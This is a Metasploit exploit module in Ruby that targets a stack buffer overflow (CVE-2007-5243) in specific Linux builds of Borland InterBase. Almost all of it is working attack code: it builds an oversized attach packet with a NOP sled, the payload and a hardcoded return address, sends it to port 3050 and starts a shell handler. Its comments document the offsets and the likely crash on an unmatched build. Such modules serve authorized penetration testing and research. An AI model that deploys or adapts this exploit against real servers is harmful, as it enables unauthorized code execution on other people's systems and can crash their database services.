##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
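class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Borland InterBase PWD_db_aliased() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Borland InterBase
          by sending a specially crafted attach request.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38607' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Payload' => {
          # Upper bound the framework enforces on payload.encoded. The NOP
          # sled built in #exploit absorbs whatever is left of the
          # 1152-byte overflow string, so the return-address slot stays at
          # a fixed offset for any payload up to this size.
          'Space' => 512,
          # NUL and the separators '/', ':', '@', '\' must not appear in the
          # encoded payload -- presumably because the overflowing string is
          # handled as a database path/alias by the server (see advisory).
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
        'Targets' => [
          # 0x0804cbe4 pop esi; pop ebp; ret
          # A fixed absolute address inside the InterBase binary: this only
          # works when that binary is loaded at its link-time address (no
          # relocation), and only for the builds listed below.
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804cbe4 }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-10-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )
  end

  # Sends one op_attach packet whose first string overflows the stack buffer
  # in PWD_db_aliased(). Wire layout (all length/opcode fields are 32-bit
  # big-endian; the return address is little-endian x86):
  #
  #   op_attach | id=0 | len=1152 | nops .. payload .. ret | pad | len=1024 | alpha
  #
  # nops + payload + ret add up to exactly 1152 bytes, so the overwritten
  # return slot lands at the same offset regardless of payload length.
  # No version probe is done before firing: a wrong target build most likely
  # crashes the service (Stability is declared UNKNOWN above).
  def exploit
    connect

    op_attach = 19   # InterBase wire protocol: attach database
    str_len = 1152   # size of the overflowing string, including the ret address

    # 4-byte (XDR-style) alignment padding for the string body. 1152 is
    # already a multiple of 4, so this is zero today; written in the general
    # form so a change to str_len keeps the following field aligned.
    pad_len = (-str_len) % 4

    # 'Space' => 512 guarantees the encoded payload fits with room for the
    # sled and the 4-byte return address; fail loudly rather than hand
    # make_nops a negative count if that bound is ever loosened.
    sled_len = str_len - payload.encoded.length - 4
    fail_with(Failure::BadConfig, 'Encoded payload does not fit in the overflow string') if sled_len < 0

    packet = String.new   # ASCII-8BIT buffer: raw bytes are appended verbatim

    # Operation/packet type
    packet << [op_attach].pack('N')

    # Id
    packet << [0].pack('N')

    # Length of the string that follows
    packet << [str_len].pack('N')

    # Original authors: execution "will return into this nop block" via the
    # pop/pop/ret gadget selected as Ret. The sled precedes the payload so
    # any landing point inside it slides into the shellcode.
    packet << make_nops(sled_len)

    # Payload
    packet << payload.encoded

    # Overwritten saved return address, little-endian
    packet << [target.ret].pack('V')

    # Alignment padding. 0x00 is a bad char for the payload, but this sits
    # after the return address and is never executed.
    packet << "\x00" * pad_len

    # Second string: length field plus 1024 bytes of alpha filler, which
    # contains none of the declared bad chars.
    packet << [1024].pack('N')
    packet << rand_text_alpha(1024)

    sock.put(packet)

    handler
  end
end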